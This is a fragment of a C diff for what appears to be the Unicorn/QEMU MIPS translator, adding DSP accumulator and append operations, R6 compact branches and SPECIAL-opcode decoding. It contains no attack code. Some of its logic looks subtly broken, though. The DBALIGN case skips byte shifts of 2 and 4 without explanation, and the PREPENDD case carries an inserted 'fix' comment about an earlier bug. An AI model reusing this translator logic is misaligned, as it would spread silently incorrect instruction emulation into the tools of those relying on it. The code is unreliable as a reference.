+ if (sa != 0) { + tcg_gen_deposit_tl(tcg_ctx, *cpu_gpr[rt], t0, *cpu_gpr[rt], sa, 64 - sa); + } + break; + case OPC_PREPENDD: + tcg_gen_shri_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt], 0x20 | sa); + tcg_gen_shli_tl(tcg_ctx, t0, t0, 64 - (0x20 | sa)); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[rt], t0, *cpu_gpr[rt]); /* fix: was (t0 | t0), which discarded the right-shifted rt half computed above */ + break; + case OPC_PREPENDW: + if (sa != 0) { + tcg_gen_shri_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt], sa); + tcg_gen_shli_tl(tcg_ctx, t0, t0, 64 - sa); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt], t0); + } + break; + case OPC_DBALIGN: + sa &= 7; + if (sa != 0 && sa
!= 2 && sa != 4) { + tcg_gen_shli_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt], 8 * sa); + tcg_gen_shri_tl(tcg_ctx, t0, t0, 8 * (8 - sa)); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt], t0); + } + break; + default: /* Invalid */ + MIPS_INVAL("MASK DAPPEND"); + generate_exception(ctx, EXCP_RI); + break; + } + break; +#endif + } + tcg_temp_free(tcg_ctx, t0); + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s", opn); +} + +static void gen_mipsdsp_accinsn(DisasContext *ctx, uint32_t op1, uint32_t op2, + int ret, int v1, int v2, int check_ret) + +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "mipsdsp accumulator"; + TCGv t0; + TCGv t1; + TCGv v1_t; + TCGv v2_t; + int16_t imm; + + if ((ret == 0) && (check_ret == 1)) { + /* Treat as NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); + v1_t = tcg_temp_new(tcg_ctx); + v2_t = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, v1_t, v1); + gen_load_gpr(ctx, v2_t, v2); + + switch (op1) { + case OPC_EXTR_W_DSP: + check_dsp(ctx); + switch (op2) { + case OPC_EXTR_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_extr_w(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_EXTR_R_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_extr_r_w(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_EXTR_RS_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_extr_rs_w(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_EXTR_S_H: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_extr_s_h(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_EXTRV_S_H: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_extr_s_h(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_EXTRV_W: + 
tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_extr_w(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_EXTRV_R_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_extr_r_w(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_EXTRV_RS_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_extr_rs_w(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_EXTP: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_extp(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_EXTPV: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_extp(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_EXTPDP: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_extpdp(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_EXTPDPV: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_extpdp(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_SHILO: + imm = (ctx->opcode >> 20) & 0x3F; + tcg_gen_movi_tl(tcg_ctx, t0, ret); + tcg_gen_movi_tl(tcg_ctx, t1, imm); + gen_helper_shilo(tcg_ctx, t0, t1, tcg_ctx->cpu_env); + break; + case OPC_SHILOV: + tcg_gen_movi_tl(tcg_ctx, t0, ret); + gen_helper_shilo(tcg_ctx, t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_MTHLIP: + tcg_gen_movi_tl(tcg_ctx, t0, ret); + gen_helper_mthlip(tcg_ctx, t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_WRDSP: + imm = (ctx->opcode >> 11) & 0x3FF; + tcg_gen_movi_tl(tcg_ctx, t0, imm); + gen_helper_wrdsp(tcg_ctx, v1_t, t0, tcg_ctx->cpu_env); + break; + case OPC_RDDSP: + imm = (ctx->opcode >> 16) & 0x03FF; + tcg_gen_movi_tl(tcg_ctx, t0, imm); + gen_helper_rddsp(tcg_ctx, *cpu_gpr[ret], t0, tcg_ctx->cpu_env); + break; + } + break; +#ifdef TARGET_MIPS64 + case OPC_DEXTR_W_DSP: + check_dsp(ctx); + switch (op2) { + case OPC_DMTHLIP: + tcg_gen_movi_tl(tcg_ctx, t0, ret); + gen_helper_dmthlip(tcg_ctx, v1_t, t0, tcg_ctx->cpu_env); + break; + 
case OPC_DSHILO: + { + int shift = (ctx->opcode >> 19) & 0x7F; + int ac = (ctx->opcode >> 11) & 0x03; + tcg_gen_movi_tl(tcg_ctx, t0, shift); + tcg_gen_movi_tl(tcg_ctx, t1, ac); + gen_helper_dshilo(tcg_ctx, t0, t1, tcg_ctx->cpu_env); + break; + } + case OPC_DSHILOV: + { + int ac = (ctx->opcode >> 11) & 0x03; + tcg_gen_movi_tl(tcg_ctx, t0, ac); + gen_helper_dshilo(tcg_ctx, v1_t, t0, tcg_ctx->cpu_env); + break; + } + case OPC_DEXTP: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + + gen_helper_dextp(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTPV: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_dextp(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_DEXTPDP: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_dextpdp(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTPDPV: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_dextpdp(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_DEXTR_L: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_dextr_l(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTR_R_L: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_dextr_r_l(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTR_RS_L: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_dextr_rs_l(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTR_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_dextr_w(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTR_R_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_dextr_r_w(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTR_RS_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + 
tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_dextr_rs_w(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTR_S_H: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_dextr_s_h(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTRV_S_H: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + tcg_gen_movi_tl(tcg_ctx, t1, v1); + gen_helper_dextr_s_h(tcg_ctx, *cpu_gpr[ret], t0, t1, tcg_ctx->cpu_env); + break; + case OPC_DEXTRV_L: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_dextr_l(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_DEXTRV_R_L: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_dextr_r_l(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_DEXTRV_RS_L: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_dextr_rs_l(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_DEXTRV_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_dextr_w(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_DEXTRV_R_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_dextr_r_w(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + case OPC_DEXTRV_RS_W: + tcg_gen_movi_tl(tcg_ctx, t0, v2); + gen_helper_dextr_rs_w(tcg_ctx, *cpu_gpr[ret], t0, v1_t, tcg_ctx->cpu_env); + break; + } + break; +#endif + } + + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free(tcg_ctx, v1_t); + tcg_temp_free(tcg_ctx, v2_t); + + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s", opn); +} + +/* End MIPSDSP functions. 
*/ + +/* Compact Branches */ +static void gen_compute_compact_branch(DisasContext *ctx, uint32_t opc, + int rs, int rt, int32_t offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + int bcond_compute = 0; + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + + if (ctx->hflags & MIPS_HFLAG_BMASK) { +#ifdef MIPS_DEBUG_DISAS + LOG_DISAS("Branch in delay / forbidden slot at PC 0x" TARGET_FMT_lx + "\n", ctx->pc); +#endif + generate_exception(ctx, EXCP_RI); + goto out; + } + + /* Load needed operands and calculate btarget */ + switch (opc) { + /* compact branch */ + case OPC_BOVC: /* OPC_BEQZALC, OPC_BEQC */ + case OPC_BNVC: /* OPC_BNEZALC, OPC_BNEC */ + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + bcond_compute = 1; + ctx->btarget = addr_add(ctx, ctx->pc + 4, offset); + if (rs <= rt && rs == 0) { + /* OPC_BEQZALC, OPC_BNEZALC */ + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[31], ctx->pc + 4); + } + break; + case OPC_BLEZC: /* OPC_BGEZC, OPC_BGEC */ + case OPC_BGTZC: /* OPC_BLTZC, OPC_BLTC */ + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + bcond_compute = 1; + ctx->btarget = addr_add(ctx, ctx->pc + 4, offset); + break; + case OPC_BLEZALC: /* OPC_BGEZALC, OPC_BGEUC */ + case OPC_BGTZALC: /* OPC_BLTZALC, OPC_BLTUC */ + if (rs == 0 || rs == rt) { + /* OPC_BLEZALC, OPC_BGEZALC */ + /* OPC_BGTZALC, OPC_BLTZALC */ + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[31], ctx->pc + 4); + } + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + bcond_compute = 1; + ctx->btarget = addr_add(ctx, ctx->pc + 4, offset); + break; + case OPC_BC: + case OPC_BALC: + ctx->btarget = addr_add(ctx, ctx->pc + 4, offset); + break; + case OPC_BEQZC: + case OPC_BNEZC: + if (rs != 0) { + /* OPC_BEQZC, OPC_BNEZC */ + gen_load_gpr(ctx, t0, rs); + bcond_compute = 1; + ctx->btarget = addr_add(ctx, ctx->pc + 4, offset); + } else { + /* OPC_JIC, OPC_JIALC */ + TCGv tbase = tcg_temp_new(tcg_ctx); + TCGv toffset = tcg_temp_new(tcg_ctx); 
+ + gen_load_gpr(ctx, tbase, rt); + tcg_gen_movi_tl(tcg_ctx, toffset, offset); + gen_op_addr_add(ctx, *(TCGv *)tcg_ctx->btarget, tbase, toffset); + tcg_temp_free(tcg_ctx, tbase); + tcg_temp_free(tcg_ctx, toffset); + } + break; + default: + MIPS_INVAL("Compact branch/jump"); + generate_exception(ctx, EXCP_RI); + goto out; + } + + if (bcond_compute == 0) { + /* Unconditional compact branch */ + switch (opc) { + case OPC_JIALC: + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[31], ctx->pc + 4); + /* Fallthrough */ + case OPC_JIC: + ctx->hflags |= MIPS_HFLAG_BR; + break; + case OPC_BALC: + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[31], ctx->pc + 4); + /* Fallthrough */ + case OPC_BC: + ctx->hflags |= MIPS_HFLAG_B; + break; + default: + MIPS_INVAL("Compact branch/jump"); + generate_exception(ctx, EXCP_RI); + goto out; + } + + /* Generating branch here as compact branches don't have delay slot */ + gen_branch(ctx, 4); + } else { + /* Conditional compact branch */ + int fs = gen_new_label(tcg_ctx); + save_cpu_state(ctx, 0); + + switch (opc) { + case OPC_BLEZALC: /* OPC_BGEZALC, OPC_BGEUC */ + if (rs == 0 && rt != 0) { + /* OPC_BLEZALC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LE), t1, 0, fs); + } else if (rs != 0 && rt != 0 && rs == rt) { + /* OPC_BGEZALC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GE), t1, 0, fs); + } else { + /* OPC_BGEUC */ + tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GEU), t0, t1, fs); + } + break; + case OPC_BGTZALC: /* OPC_BLTZALC, OPC_BLTUC */ + if (rs == 0 && rt != 0) { + /* OPC_BGTZALC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GT), t1, 0, fs); + } else if (rs != 0 && rt != 0 && rs == rt) { + /* OPC_BLTZALC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LT), t1, 0, fs); + } else { + /* OPC_BLTUC */ + tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LTU), t0, t1, fs); + } + break; + case OPC_BLEZC: /* OPC_BGEZC, OPC_BGEC */ + if (rs == 0 && rt != 0) { + /* OPC_BLEZC */ + tcg_gen_brcondi_tl(tcg_ctx, 
tcg_invert_cond(TCG_COND_LE), t1, 0, fs); + } else if (rs != 0 && rt != 0 && rs == rt) { + /* OPC_BGEZC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GE), t1, 0, fs); + } else { + /* OPC_BGEC */ + tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GE), t0, t1, fs); + } + break; + case OPC_BGTZC: /* OPC_BLTZC, OPC_BLTC */ + if (rs == 0 && rt != 0) { + /* OPC_BGTZC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GT), t1, 0, fs); + } else if (rs != 0 && rt != 0 && rs == rt) { + /* OPC_BLTZC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LT), t1, 0, fs); + } else { + /* OPC_BLTC */ + tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LT), t0, t1, fs); + } + break; + case OPC_BOVC: /* OPC_BEQZALC, OPC_BEQC */ + case OPC_BNVC: /* OPC_BNEZALC, OPC_BNEC */ + if (rs >= rt) { + /* OPC_BOVC, OPC_BNVC */ + TCGv t2 = tcg_temp_new(tcg_ctx); + TCGv t3 = tcg_temp_new(tcg_ctx); + TCGv t4 = tcg_temp_new(tcg_ctx); + TCGv input_overflow = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + tcg_gen_ext32s_tl(tcg_ctx, t2, t0); + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, input_overflow, t2, t0); + tcg_gen_ext32s_tl(tcg_ctx, t3, t1); + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, t4, t3, t1); + tcg_gen_or_tl(tcg_ctx, input_overflow, input_overflow, t4); + + tcg_gen_add_tl(tcg_ctx, t4, t2, t3); + tcg_gen_ext32s_tl(tcg_ctx, t4, t4); + tcg_gen_xor_tl(tcg_ctx, t2, t2, t3); + tcg_gen_xor_tl(tcg_ctx, t3, t4, t3); + tcg_gen_andc_tl(tcg_ctx, t2, t3, t2); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, t4, t2, 0); + tcg_gen_or_tl(tcg_ctx, t4, t4, input_overflow); + if (opc == OPC_BOVC) { + /* OPC_BOVC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_NE), t4, 0, fs); + } else { + /* OPC_BNVC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_EQ), t4, 0, fs); + } + tcg_temp_free(tcg_ctx, input_overflow); + tcg_temp_free(tcg_ctx, t4); + tcg_temp_free(tcg_ctx, t3); + tcg_temp_free(tcg_ctx, t2); + } else if (rs < rt && rs == 0) 
{ + /* OPC_BEQZALC, OPC_BNEZALC */ + if (opc == OPC_BEQZALC) { + /* OPC_BEQZALC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_EQ), t1, 0, fs); + } else { + /* OPC_BNEZALC */ + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_NE), t1, 0, fs); + } + } else { + /* OPC_BEQC, OPC_BNEC */ + if (opc == OPC_BEQC) { + /* OPC_BEQC */ + tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_EQ), t0, t1, fs); + } else { + /* OPC_BNEC */ + tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_NE), t0, t1, fs); + } + } + break; + case OPC_BEQZC: + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_EQ), t0, 0, fs); + break; + case OPC_BNEZC: + tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_NE), t0, 0, fs); + break; + default: + MIPS_INVAL("Compact conditional branch/jump"); + generate_exception(ctx, EXCP_RI); + goto out; + } + + /* Generating branch here as compact branches don't have delay slot */ + gen_goto_tb(ctx, 1, ctx->btarget); + gen_set_label(tcg_ctx, fs); + + ctx->hflags |= MIPS_HFLAG_FBNSLOT; + MIPS_DEBUG("Compact conditional branch"); + } + +out: + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static void decode_opc_special_r6(CPUMIPSState *env, DisasContext *ctx) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + int rs, rt, rd, sa; + uint32_t op1, op2; + + rs = (ctx->opcode >> 21) & 0x1f; + rt = (ctx->opcode >> 16) & 0x1f; + rd = (ctx->opcode >> 11) & 0x1f; + sa = (ctx->opcode >> 6) & 0x1f; + + op1 = MASK_SPECIAL(ctx->opcode); + switch (op1) { + case OPC_LSA: + if (rd != 0) { + int imm2 = extract32(ctx->opcode, 6, 3); + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + tcg_gen_shli_tl(tcg_ctx, t0, t0, imm2 + 1); + tcg_gen_add_tl(tcg_ctx, t0, t0, t1); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rd], t0); + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free(tcg_ctx, t0); + } + break; + case OPC_MULT: case OPC_MULTU: case 
OPC_DIV: case OPC_DIVU: + op2 = MASK_R6_MULDIV(ctx->opcode); + switch (op2) { + case R6_OPC_MUL: + case R6_OPC_MUH: + case R6_OPC_MULU: + case R6_OPC_MUHU: + case R6_OPC_DIV: + case R6_OPC_MOD: + case R6_OPC_DIVU: + case R6_OPC_MODU: + gen_r6_muldiv(ctx, op2, rd, rs, rt); + break; + default: + MIPS_INVAL("special_r6 muldiv"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_SELEQZ: + case OPC_SELNEZ: + gen_cond_move(ctx, op1, rd, rs, rt); + break; + case R6_OPC_CLO: + case R6_OPC_CLZ: + if (rt == 0 && sa == 1) { + /* Major opcode and function field is shared with preR6 MFHI/MTHI. + We need additionally to check other fields */ + gen_cl(ctx, op1, rd, rs); + } else { + generate_exception(ctx, EXCP_RI); + } + break; + case R6_OPC_SDBBP: + if (ctx->hflags & MIPS_HFLAG_SBRI) { + generate_exception(ctx, EXCP_RI); + } else { + generate_exception(ctx, EXCP_DBp); + } + break; +#if defined(TARGET_MIPS64) + case OPC_DLSA: + check_mips_64(ctx); + if (rd != 0) { + int imm2 = extract32(ctx->opcode, 6, 3); + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rs); + gen_load_gpr(ctx, t1, rt); + tcg_gen_shli_tl(tcg_ctx, t0, t0, imm2 + 1); + tcg_gen_add_tl(tcg_ctx, *cpu_gpr[rd], t0, t1); + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free(tcg_ctx, t0); + } + break; + case R6_OPC_DCLO: + case R6_OPC_DCLZ: + if (rt == 0 && sa == 1) { + /* Major opcode and function field is shared with preR6 MFHI/MTHI. 
+ We need additionally to check other fields */ + check_mips_64(ctx); + gen_cl(ctx, op1, rd, rs); + } else { + generate_exception(ctx, EXCP_RI); + } + break; + case OPC_DMULT: case OPC_DMULTU: case OPC_DDIV: case OPC_DDIVU: + op2 = MASK_R6_MULDIV(ctx->opcode); + switch (op2) { + case R6_OPC_DMUL: + case R6_OPC_DMUH: + case R6_OPC_DMULU: + case R6_OPC_DMUHU: + case R6_OPC_DDIV: + case R6_OPC_DMOD: + case R6_OPC_DDIVU: + case R6_OPC_DMODU: + check_mips_64(ctx); + gen_r6_muldiv(ctx, op2, rd, rs, rt); + break; + default: + MIPS_INVAL("special_r6 muldiv"); + generate_exception(ctx, EXCP_RI); + break; + } + break; +#endif + default: /* Invalid */ + MIPS_INVAL("special_r6"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +static void decode_opc_special_legacy(CPUMIPSState *env, DisasContext *ctx) +{ + int rs, rt, rd, sa; + uint32_t op1; + + rs = (ctx->opcode >> 21) & 0x1f; + rt = (ctx->opcode >> 16) & 0x1f; + rd = (ctx->opcode >> 11) & 0x1f; + sa = (ctx->opcode >> 6) & 0x1f; + + op1 = MASK_SPECIAL(ctx->opcode); + switch (op1) { + case OPC_MOVN: /* Conditional move */ + case OPC_MOVZ: + check_insn(ctx, ISA_MIPS4 | ISA_MIPS32 | + INSN_LOONGSON2E | INSN_LOONGSON2F); + gen_cond_move(ctx, op1, rd, rs, rt); + break; + case OPC_MFHI: /* Move from HI/LO */ + case OPC_MFLO: + gen_HILO(ctx, op1, rs & 3, rd); + break; + case OPC_MTHI: + case OPC_MTLO: /* Move to HI/LO */ + gen_HILO(ctx, op1, rd & 3, rs); + break; + case OPC_MOVCI: + check_insn(ctx, ISA_MIPS4 | ISA_MIPS32); + if (env->CP0_Config1 & (1 << CP0C1_FP)) { + check_cp1_enabled(ctx); + gen_movci(ctx, rd, rs, (ctx->opcode >> 18) & 0x7, + (ctx->opcode >> 16) & 1); + } else { + generate_exception_err(ctx, EXCP_CpU, 1); + } + break; + case OPC_MULT: + case OPC_MULTU: + if (sa) { + check_insn(ctx, INSN_VR54XX); + op1 = MASK_MUL_VR54XX(ctx->opcode); + gen_mul_vr54xx(ctx, op1, rd, rs, rt); + } else { + gen_muldiv(ctx, op1, rd & 3, rs, rt); + } + break; + case OPC_DIV: + case OPC_DIVU: + gen_muldiv(ctx, op1, 0, rs, rt); + 
break; +#if defined(TARGET_MIPS64) + case OPC_DMULT: case OPC_DMULTU: case OPC_DDIV: case OPC_DDIVU: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_muldiv(ctx, op1, 0, rs, rt); + break; +#endif + case OPC_JR: + gen_compute_branch(ctx, op1, 4, rs, rd, sa, 4); + break; + case OPC_SPIM: +#ifdef MIPS_STRICT_STANDARD + MIPS_INVAL("SPIM"); + generate_exception(ctx, EXCP_RI); +#else + /* Implemented as RI exception for now. */ + MIPS_INVAL("spim (unofficial)"); + generate_exception(ctx, EXCP_RI); +#endif + break; + default: /* Invalid */ + MIPS_INVAL("special_legacy"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +static void decode_opc_special(CPUMIPSState *env, DisasContext *ctx) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + int rs, rt, rd, sa; + uint32_t op1; + + rs = (ctx->opcode >> 21) & 0x1f; + rt = (ctx->opcode >> 16) & 0x1f; + rd = (ctx->opcode >> 11) & 0x1f; + sa = (ctx->opcode >> 6) & 0x1f; + + op1 = MASK_SPECIAL(ctx->opcode); + switch (op1) { + case OPC_SLL: /* Shift with immediate */ + if (sa == 5 && rd == 0 && + rs == 0 && rt == 0) { /* PAUSE */ + if ((ctx->insn_flags & ISA_MIPS32R6) && + (ctx->hflags & MIPS_HFLAG_BMASK)) { + MIPS_DEBUG("CTI in delay / forbidden slot"); + generate_exception(ctx, EXCP_RI); + break; + } + } + /* Fallthrough */ + case OPC_SRA: + gen_shift_imm(ctx, op1, rd, rt, sa); + break; + case OPC_SRL: + switch ((ctx->opcode >> 21) & 0x1f) { + case 1: + /* rotr is decoded as srl on non-R2 CPUs */ + if (ctx->insn_flags & ISA_MIPS32R2) { + op1 = OPC_ROTR; + } + /* Fallthrough */ + case 0: + gen_shift_imm(ctx, op1, rd, rt, sa); + break; + default: + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_ADD: case OPC_ADDU: case OPC_SUB: case OPC_SUBU: + gen_arith(ctx, op1, rd, rs, rt); + break; + case OPC_SLLV: /* Shifts */ + case OPC_SRAV: + gen_shift(ctx, op1, rd, rs, rt); + break; + case OPC_SRLV: + switch ((ctx->opcode >> 6) & 0x1f) { + case 1: + /* rotrv is decoded as srlv on non-R2 CPUs */ + if 
(ctx->insn_flags & ISA_MIPS32R2) { + op1 = OPC_ROTRV; + } + /* Fallthrough */ + case 0: + gen_shift(ctx, op1, rd, rs, rt); + break; + default: + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_SLT: /* Set on less than */ + case OPC_SLTU: + gen_slt(ctx, op1, rd, rs, rt); + break; + case OPC_AND: /* Logic*/ + case OPC_OR: + case OPC_NOR: + case OPC_XOR: + gen_logic(ctx, op1, rd, rs, rt); + break; + case OPC_JALR: + gen_compute_branch(ctx, op1, 4, rs, rd, sa, 4); + break; + case OPC_TGE: case OPC_TGEU: case OPC_TLT: case OPC_TLTU: case OPC_TEQ: + case OPC_TNE: + gen_trap(ctx, op1, rs, rt, -1); + break; + case OPC_LSA: /* OPC_PMON */ + if ((ctx->insn_flags & ISA_MIPS32R6) || + (env->CP0_Config3 & (1 << CP0C3_MSAP))) { + decode_opc_special_r6(env, ctx); + } else { + /* Pmon entry point, also R4010 selsl */ +#ifdef MIPS_STRICT_STANDARD + MIPS_INVAL("PMON / selsl"); + generate_exception(ctx, EXCP_RI); +#else + gen_helper_0e0i(tcg_ctx, pmon, sa); +#endif + } + break; + case OPC_SYSCALL: + generate_exception(ctx, EXCP_SYSCALL); + ctx->bstate = BS_STOP; + break; + case OPC_BREAK: + generate_exception(ctx, EXCP_BREAK); + break; + case OPC_SYNC: + /* 